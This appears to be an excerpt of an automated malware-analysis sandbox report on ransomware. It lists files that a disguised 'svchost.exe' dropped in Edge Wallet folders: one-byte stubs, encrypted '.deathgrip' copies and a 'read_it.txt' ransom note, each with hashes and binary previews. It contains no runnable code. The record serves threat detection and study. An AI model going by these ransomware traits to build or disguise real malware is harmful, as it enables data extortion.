                                                          Preview:........t-3GF.'$S.....q.9..X.]B...."t.?.Ot../M...>?...P.1.A~%...FM...T...W.u6.02...w.B.?...%...R.......6YA.y.%<.0..B..E..B.K......W.`.6.r.t+.Y5.. ..}.'..oT..Y..*M..{.N....b...>..$.%..R...6.Ik~8.'...#.>D..PE..f..z.&....+..-.B.~)..N...R...h:4.*f4.{..).OMj.......G. .!u.'Y|.S&............m.....f...}>..C.....|.qM..........).0'....r....a.,.|.t..O.... x.eI'.?.^.+&.....J9Jm-......2.....G0..`.z...t....dm.Q..._pn.e..G...............l..(..|.&5U....Z.G..<...s8..o.....k.h.>....*h.u.`.............<d...Y4s.....E.7 ...m.2.:.._...5s..WC..WeK...H..p..b...x......r.iQ2..Q.h.....L...k..].d^..[K.D.|.`kk.?...gx...3."o].pj.3MQd,..lF%Jz=.C0.".c.kN=....1(uD:......v}...A.S.m.c.L..u..=....l..FD..$. .P.mS...d;&...4....}..........J.9..!..7qN..7.f%r... ..f5.T......dx..Y..vh3.n2e....xw.Y.>..>...nDa.J.?fYITB..8..5....f.0.YA....Xf.y.'a.6w.F..,.6.A.}....77.x...N....O.KK.H...`]..X..Of.?..o[^...t...qR...D..bDq.7.`.HY...B.s.YWN.JR.\n...Ch.....v.:........K[x&2.1O...`........w..%..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):17232
                                                          Entropy (8bit):7.988915886208556
                                                          Encrypted:false
                                                          SSDEEP:384:jitUuPLFuZhWq67/r6LHWPtsFjOMmdvjIweB3SMUZ3M:jitUuDFX9jq2P2F0jrIYBM
                                                          MD5:9DFA4A5B46578DD702A29B78632C8A65
                                                          SHA1:FBFDB11B94001FCCD212257AB7A17734D6530ECE
                                                          SHA-256:07E271D5673F437FAF45724D54B633C3C0F9C1DA278099E63E62D247DA45825D
                                                          SHA-512:0C604D28C8894E0C4A6D740D7535BA777AECCE53C1E904DCA819B45F3F65F82F9700D826E93E7FB454264BA858BAAB5905BB837C650293F601A64F2D72FB7AAE
                                                          Malicious:false
                                                          Preview:........lC!.*BV.>p[......tSZ1....R.X.H........G.1.$.u......Z.S..@..nq....Z.@J.......~.kS..gk..Y.[.2C.....gJ..B..n.Y.C+.[?.wn?wx.=A.e....3.u..T.d......B@....1...a..aM.8....0J...4.xAT^{.,6+..N.........U...*a....x..:..W..D-T...j.....,.j.7...5R..*1.......6.Y%.OL...H.<J..]^F!..sSG. s....a....ZZ,..?9.Z%`.|........)....t..sH..,2..3H..-#.4.j.L.:....|.....W?..4&i....>..K..i.^....T..f.QE~'....~.=.5.o.a...YCy..z.k:..b..>...#..#.J.5.yG.He...).j...v:y......'57JsA@.8....;0...j....].r..K..G.._4.tee....:2Z.?...C...pT....z%.cY#.D._...E...n.M\_..6.Xm.,..gc.Vs..@D.......k...\.W~u......8x...3..l.....G`..L..]...C&~T5I..../......|..x5.7..-..?....0...6..@..U.M/....7...uWH-Z......\d.?.......H.....=.P..D}$..?... .T.&"...f.......5ior...~..E...].jkG`.\).....r........0.4.D...3.....b....|.P..j.d.......8..O.r.J.X...%T92.?..-..[..+.Y.ql..p../...4.Vh..G.K.?....x.B...C...r.`$..f..\..Q.7..#.....L....!:.,c..s.2....4..~.2T..VJ/...y.|....p.../u..b^9:;....N....D)....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\nl\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\nl\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14816
                                                          Entropy (8bit):7.987240227013427
                                                          Encrypted:false
                                                          SSDEEP:384:qUmLitt+lAinQUa7xC5C8bHjGdbbovgjq9KilYa559Z1v:qHat0QUAg5tEoYjsYq1v
                                                          MD5:046047413505B5DE72C4A756F559CB99
                                                          SHA1:B0A89E06E93DB900C3B8E3AFD5BDE6505301196C
                                                          SHA-256:260B83CC483531E494A18510A6CE2DFEBAF551F346E07125912B023C3BDD1281
                                                          SHA-512:3A6F693255E54EAF23F1D2055CB196BBFF6F69829A0D8A566AC64C00182CE5CA2B0C1A7AB01A4F6D8221F8B196F993EF06A4EEE456294E209A384FF3B784BF21
                                                          Malicious:false
                                                          Preview:........~..B......5.+.>7Z{.._....K..l..|@......'xVI...^..B..\q.23............V.iCuNi"....se.&.~....0.Y@z.4....g22YJ..:.}.N.x...._..X.g..|.:8..n...).....P..-..Fv.....V.#0.P..F..fp..@m..2.bY.=.....{...E.T.G.&...%..^.V.[2\;./..../.......e. .%....-._.......sIbP...*.....k.....1/SX.j..73E..N}..Gf{.\.Y.|d@j.-..bs..g.So./nc.I.0S.I.....b"..D.;[.]*).....H..fO.I.v...s+.....b.;.RM.e...v.,\+o..23~..........-.Y.V.-5)Dg.h.A.YY$^..o....>Sm...H...<.[[.Nd..h.%..W..I..W..WO.2....L.......[SN)@5.[tB:....S.+....c.(........S........z.a..$p...[`...r....0..`..O.m.....?....,n....w...pc..5g.(...8t.9\.V.)+.Tuq.*..w.a.MG.FbL..K5;.|\.H..Mz....ow..L.@sM..u....M...V.vS...1..v.........n...]..V...i9..we.......%.5.$...52.^k........uh...$R..2..I..<.n..E..4..:..$.....`.-.`ZUvB7b.....Q}.......2.|..KW..+,u{.faV.$....3."0D%......7.z.`..DC.}.n*7..@..........m.#BDF.1.....N.:.4...v.}.Z...^...}...O.q~+./i..coq......e.h5M..n...2..7G.T.g.".......EU..[....#"(....9.@.l-......Ss....vh...I..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14800
                                                          Entropy (8bit):7.984126295386031
                                                          Encrypted:false
                                                          SSDEEP:384:d/CX+tehfrh1LS3xJk3XHNSEt/YLBCYLaD:d/m+ehfFmx23XHNp9XAaD
                                                          MD5:D4C11614EB2AD1E14241285598671475
                                                          SHA1:0524CB614B98962656715144492BCF10729E239C
                                                          SHA-256:95937483A1A328541698FEE31E3B97D78AD73B01BE4EA04A46020999363DADCA
                                                          SHA-512:1D673D1C716E7A5B259F5D92A9A4098C2C2573DBC2DC6C8919A1656E66AE4C6C6A250A07293193E6310E2CA2BD23D0B45B1E956351E00037841E2E1F814C25A9
                                                          Malicious:false
                                                          Preview:..........t::.].f=..2...#_..a.....x....<.u?$..J[<..T}..}'...:E]....d..H.I..m.........(te.#..."?.T.N.Gy....?0&".J7.=!MJ)^z.-+g^.0.Xo..C..>..P4.BZ...'.O... .T..Y..!)N....S..)....c..Nd`....w.i.v.2pj.ik.3!..Rwx....N.d....zM.....E.[Y1......s.....AY...9..N...~E.I..;.-\.x...[Z.{A...C...t.i....H...X...O........=....IDyi..v,.''..zn.O..A4}.:2L_.}O...nv...l...C.G@(..b...z.e...V.9.k$..!. .l|.7._."\.tu2..!.w..v7p.....@.V......|..~D.7G{...f0..V.+]j.....|f&C.N|..s.[..X@..g.f.F...q...vk$E...`<.^.....! 4;..6p... ..\w.?... ...............R...vJ.o.I.ed.\x...*.|....q.!w.}...i.i}....^..X....5.@m....U.C...R..T...B......t2.9U;..D.e.`.Y..<|......./w.UD..;.$...O..%GH..4.z").......M.w.T.....U.r.8.7...tB..n..KM0|.P.z,a.~.......$.P.LT...f.$..........[0.GwY...x|u.....-.:...8..C....ez..S|h9.........*..de..w_}.....?..+v0..\Ec#H."U.p....93..E.....Z..b......?.....S.e.K..8s.K<L.c.B.(.A.O....Y+.d.7..v...Fs........0|0.fslL.g.@.$O...h.Olq..{.q....6L.P;.L|D..d#.."g..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14976
                                                          Entropy (8bit):7.987513392403904
                                                          Encrypted:false
                                                          SSDEEP:384:dEVze4Gh70DY9exFRxMgq8GRJ1YfRfa1yns+uW8QCpyd:O7EI5xM98wjqRkp+uDpyd
                                                          MD5:AD51613AA45A176E2CE3BCE483B4D51A
                                                          SHA1:DCC5598AC83B22D07FB845E3C3184F49602B44F6
                                                          SHA-256:53086A9E511ADBAFECA196AAE7C339B56452AE371B26D2C6C97FF8C30B1AFA23
                                                          SHA-512:93F90BC6A4DFDB236301F66021371E6ECC2E890A109E5F67A9D49B27EF44B2FB4CC87F7E487857B384BC8584FE68F76AB3F8E45AAED5307AAB676AF3E455C3B1
                                                          Malicious:false
                                                          Preview:........(.t...Jm.gK.Bea......;.b..x..L....r.h.O.Z..*.U...:...C...l..n1:......H..0p.wG.y..,..c..R9.b....?.:....K.....zt\.v}.md.h.?Y7..>+2....L....79..3...D...7U.U%....%.f.....].F..Z2....G ....r..e.}e..j.......Wt..*...|.....`..^P....../...TTr...c.......q..X../.2.E.w.u.2....R...:....-XZF.Q.?..K.N...hpHy....v.T..6.E..z`....Dwg..5.-...3b..O.`.T~.3.2b_..[g...5:R....HxX... ..#..1...S!tOa2..Fv%Z..J-..{.@....~.....L:.N.Be.}.9..h.!?.e.q&q..............'M..........Q.LC..,.H....A55..:........n...0.v.%....=)7.>......tB..I..k.<eG\....Q..Y<..9..fr.v........t,.n..j.=$'.._........3~.Vq.MLg....(.....Ek+..KG'..#....<.+.B..4-/..Fk.....Fw.z0...`.+r.f...._M.....=......gr...!L....g(.xv+.....y.foB.....#Q....2.S&I.sspj|.....L..A .T.N..2...-..|.._&y.$..H.c.|....S O.X..<...L?.H.`_;N.3.9L.....1...~_$.....u...G.....5.I..h..7Y..-..k,.c.R*.C.w.........-.j.M.k5.......6.k..\...Qe..{.cNh...q.v...~./}...j.x.../..0A...~.~...|..xjB3.......`...IW............{..o...S.j....16..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20848
                                                          Entropy (8bit):7.991188058534037
                                                          Encrypted:true
                                                          SSDEEP:384:eiVn33OiHAXi76bW8+FPtqZcnDnezsTQK15OPRw2wBUd1WCSBiSxAe8F:eiVn33x0lbQPRnDez7oOJOBU3W7WeO
                                                          MD5:0FCAE21EE0B4A292EFE399BA3D9C6703
                                                          SHA1:00FE912D814C664F0705E507D5CD49E459DFF2DB
                                                          SHA-256:B7B6FD5AE31D1417CBF4B8C63D77042CAA9ACFD856FBB03BF6AFF92B22E83B41
                                                          SHA-512:3B96E2C856F906E2F89C2192AE0C9225446A96388F95D2DD46B9BC950495330DF157133F905FD87A05111019F15C8C5775F2FDD3517D3380241793BFA0CB667A
                                                          Malicious:true
                                                          Preview:........f.V...ad..4..%l........1jC...|.....'.(1>X..D..<$..'E.].....Y..FO.mw.......(.F.%....&..\z.....9.....z.<.../.X.....$......<J....a:...,.W..j.oRX./...&..g....3..'".9..w..X.r...}^..N.* ..K_.Eu.T.{.).!....B2.>....s.:.p.p.z..2..J..0.4..1....].:..(k....<.o..QU.kW=..K1-s..(./*.....[......7......K...~}...x6#..,.....K....E.54..b....[(....A.....Y.",he.L..........qV....J.S............'.2...&E.9*....*\..N.C..P.S..5J....llc.Y..W...kt0.8...+.../!..]....=..=..>$...{g.e.6K....TWF.&CP\..v3...W.....@yY.A.8.y.w...f....D..v...A.....=.....Z...L.E....k..!!LL.."J..^..6M*..s...\yg.la.t!qT.8Y.V. .5..[......=^7.Q..(..S..z..(?.&..fR@..7mg...}...6..t...%..]l...3......O.(..3\.......6...y.o..T.y....:..g.6h.......'L$uXF.M..W.@WaI.w..z1.+.3..$^q2......jS.._H.0.cg.S)..dY..d.{...2...6.......w.....R.........,..e.T.il).+5.%k~.V.l..NUV.o.q...H..S4EMF.H.(......G.J.Z(.3.*<.N.%d..}dB.._...Z..f{....y....:|....>.9#...^2V./...d..Q..V&.h...o......l..$\.m4l0......Z....xXy..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\sv\strings.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\sv\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14544
                                                          Entropy (8bit):7.9867650234612775
                                                          Encrypted:false
                                                          SSDEEP:384:siOKjAWM6W4FhtmRrSzsVo7Mn9CNB5Zl0cbPxw:rOKEWbF7mRrNo7M4NPZlvJw
                                                          MD5:7F75FE71491466A6AC19C7D0CC6339A1
                                                          SHA1:D9DC1511FE127D5E7635399AEB12E85EBED255CC
                                                          SHA-256:2DB2FFECDE36778D907E95D764965D7A7B37C6E517A1CA65FC79974C1829BD63
                                                          SHA-512:2E36004B5E00CF2FAAD57B762765813859D250A37BB963FBE5DE9A5426A6F5824C5D1173BD7A66DF5CE8302B60E2B5089B9980FE808DB8A88ED232D9B6406E2A
                                                          Malicious:false
                                                          Preview:..................+`=.....f..8t..|...>..).....d...g.cd.V.I...a..q....:..W.^~.5.|..^.y...Y&..............{.3....m.0......Q"z6".@j..........P.o2.....i...s....c%..g.w.a...G4.iMYy..n.w.....`...J0Q.*W.._._.>!...#;..vg.4.....0.......5.D'......T.<.Q..=.."#".......px..Pc..o...1.1...... Q.w.4...&nR.....$.)...oS!......k.L.:...}..Qp..H..t.6..6..Y. ..|O_.|q>...SJ.l...&..V..K..>........:{...es..9.z.n..o..$..uU3A...,...,p...,...%..Bm...*.B.G...F?7.....}:.....%.....FX].V..[].......&..`...s...$..nY...\..x...&ww.......m5..E_..'.F.@..H0..J.o.%..q..._s.g.0...M..zw+..T.+...G.|..L.p...~.r)?.%!./..c....4.r......+.Vl..n...\...Gn3._.b1..A....p..".z.'.|....,}..s.2...._...}6....4.7.u../.B:i.~.3,25p..$.....F.K5.Y.%!...w..k6..f|..I.Q..$............<c..G....".Y.I...qi....d0.sl+...x.._(D....y..bu?C,B.....7.F....Pw.y.d.t.Q$.... ==.z..@djP..4.i..KZs..c .......xS.0....k....q.....a.R./.z...`o.@?..f0..%`S..|F..........$*.)....2nL...u..G...FUO...f....%...Z].R..|..+..*'.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans\strings.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13232
                                                          Entropy (8bit):7.9835457547725674
                                                          Encrypted:false
                                                          SSDEEP:384:briylgUReG4tfrbS/m8cCrILQ+AcnEM82g:6CgSUtfrbS/mzCreQRDM8h
                                                          MD5:5C2FAF20AF91017889A1DBF575A99FDD
                                                          SHA1:10EE8930B363E2A00220BC8461FC1413ECC271E8
                                                          SHA-256:4D4BF43F3C0F5C8C724620B3F96DEE6DDED4CCF937123BE98F5C79ECD78BCE66
                                                          SHA-512:9E2488C2625CFA687F46B8FB6FBF0D0F167418C0A886CEAEE26E61C3D814D763B2F72B4B446EA3663C86E994AEFDD28376838671EDC5FD237D600E42684F6508
                                                          Malicious:false
                                                          Preview:.............|T[h..|..?g..!537w.x........Z..R..6{.l.d`...6F....m.Nu...U.\...."...($..hu7.J...N.0.../.&wk..|..P....CU..."..{j...9....P..u.VK.'..-#.ZV{5....V.....B)mK...J..D....;.&...0u6Mh.-.@...s.v.H...~.{F..d@]......Ke..N..Y.4..t@.g...u./..........Cm.{..hP...N.X.yV..E...C.$R.g../z.e..-........(}v!}_&`..........h.Z..)Yt.1.W7.d+.~.Q...a................*<......4..O..(...M..RMQ.s.o.r..C.tE...E....0..._DO....A.3;..\c....e..{..}.....1..PJ.X.......F...VR.|Y...;....~..%.D.......}..#....R ..j.ty.#%...1..bQHH...?{.+-B.7..T....h1ce.g@r.t...i.;.L+F...H.[ ...G.."]E..g.....jw|.Y.....r..V./..E...P..!.0(W.:..}...H..N..%..C...A..5.0.[..S.4DNew... .L..M.....2..2..aw&.z.4...DR. |...y83..F....H.+'%...v.....q0l.r..N...(...W...5U....vz... .E'.H*.u..4.l...]. .g....?v....5.>.J^t./.Vymy.a..L.R.{.[_(.m..`..b+.s{a...08"p.l/.s.b.8\!...<.Ie.R.+....a.wji ..w..&{5 .[M..).n.6e>..z...d.2..n.X.^xJ.I.ia..F.b.Mh......`.K.1.................>]`?.6..*tm..1.L...OCm...VB...{.x..Rv...4

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-pre-stable.json

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-stable.json.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2333872
                                                          Entropy (8bit):7.999924122549679
                                                          Encrypted:true
                                                          SSDEEP:49152:WeNTsM/MpRxopgJGIFw4w5GZLX3gcc14NJGpRenfutWSqf4ak4XJg0T:WeNTCua/w4wen5cUspRenfEW+aZ9T
                                                          MD5:7AC294EC7479E0C069FF98869F958BC8
                                                          SHA1:DCAE35FC254F8AD56037821A86D635354D2ADDAA
                                                          SHA-256:617F791A2ABE50AAC8FFA4A5B7FF0378A2E912037417FE3497E5AAB22ADF6AB0
                                                          SHA-512:71CA8B0A665837BE86AE1BE99FBCBC4D5336186F227C3056597C240C8691A3FEE98E983F674F9B7D921AE91964DF56F6A55AD0EE32D99908BDCF66894E47307D
                                                          Malicious:true
                                                          Preview:..........G.D.'.)p.B.V.,..$....[$.Q.w.....Sh"..7.......+D.......*Hs`...%.6..0I.r...E.....Q...*..L9.t......v.)...k^...}.....e.]..~.#.;..I.../.|......q...W..!...e..H..$.`...mz..^&.\.a.|F..9..+......m.=..._.+QC.....)F....Glb...).h.R_.'K..d.9.^N"-.s...dI.ss..5.l.-..... .....E<. ..........{.C.`...4.|.".w.U.f!..'.o.....w...yG......t...t"........Bo...Q#/...t.X=......,.Tr..Q.?.[.8.E?&........W...s.n8...0~M'.z....{...u%...3...G..s..*.p...`...T...R(.....-...y...b....I.3.O.,Vpd_.i....c.).k....P.eU....DZt.B6\[....F...,<...+...>jt....U...&C...o..vt..C..hF..Y.d...?r.....2a....aY...hl^....)...Sx..1.o.'z....X.H1d.I..Z..F....F@...w.]3?..M.)..s.JF;A.}P.U......O.5y.;.d*.(......n.....K..e..^\..t..yT.E...%.u.l.."^.8..,.r...r..x..?...9V@s.X6$..&..9Q.S...+Q.M...>..E..GbL...1w..FJjy.9.-..Q.v.V...a...L)U..!.Q........F...]R...O..(&..f.u:..8...?.....F....b+G^.......=\..i.....r..T...\?..xX.e.f...ed.:Qw!.r.Y.h...4...2......}..P.....:...!....5.....<.)I..thA....0..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet_donation_driver.js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet_donation_driver.js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1232
                                                          Entropy (8bit):7.6893922027966
                                                          Encrypted:false
                                                          SSDEEP:24:A5YKE9b5MAxK7MMkj0MtGMoORvB/Y0uhqtAosqHasam6aBucDkCMs:AuKE9bBxqqgOjYXqtAZq6sMkFgY
                                                          MD5:79CE03E268777853B48D7047CEB33443
                                                          SHA1:3FE942A7BF695AC842BBFDE3AFF2017C8CB4535A
                                                          SHA-256:77256FE1DE02EB97F81652A0BC9E49064722DE01243E57778722889A4046C7F0
                                                          SHA-512:7D87002328826186A430F76D18113EBFB4BF37911D9174329433A5C2A579A3DD029D88E0BFF17B90A6A6EEF625B692630939128B6EFF4A7EFAE09FFB5AFD33E7
                                                          Malicious:false
                                                          Preview:..................o.]!.s.....}zQ...A.D=.1.v..M.0]*:&.d.M).Nw.V..)...F.8,...9WrT.AO.........9......u&B.R`....ff....g.2.!..d."....[....gd...D....................4.z.........&........_-..Z.Nc..'...Q...*B..hS..'+N|..x...../..u..Xy.U..B...!.u..%U..a..4.+.a....i..C...."48#.....]`,.Z.x.JQ.7..8iH.....V.....A!..a~.l..A../1._p....-.a\......H4...OV.Z.[X.vj..6...D.4o.vqn.H.b,..rBF%.....*...,6C....."h.f3]8.i.g....H..8&.....I.]$._.="...C_.3.l..$......B.>...o....XF... ....5..D.EM....]iN....<..`.y".P)a..^....O...1.DK...AF..q=.c......wb{.[>;K.%@)(..P.y...Cw.S....O5QB.....#.d...X..l.+A....I..%R.5v.0....qc.......3.8FZ.Z.z"_.}.N..YGx..P.f.{T%....V.BD......Tb..."....a..+......%u... ......#..}u...F..X.j...S.....t.;.1i......8./W........b.R...x..w_..#..w.._.XM...z...\.<...v.2.&........-..z...6..@...F.begQ...l. 3..$Q.....c...p....=8.U%9...6.u..t..Pd2y...X..YRIxDriCT1FKLhJ5PomUeoK9CjcAcFXgzW7L/8jK64eD2dDz6sOU84xf8d3JMMFWKVaPga2kLQC5xzy8xOe+E0xVaFLzBqh8+Sta+zcM+rpHGm6q

                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
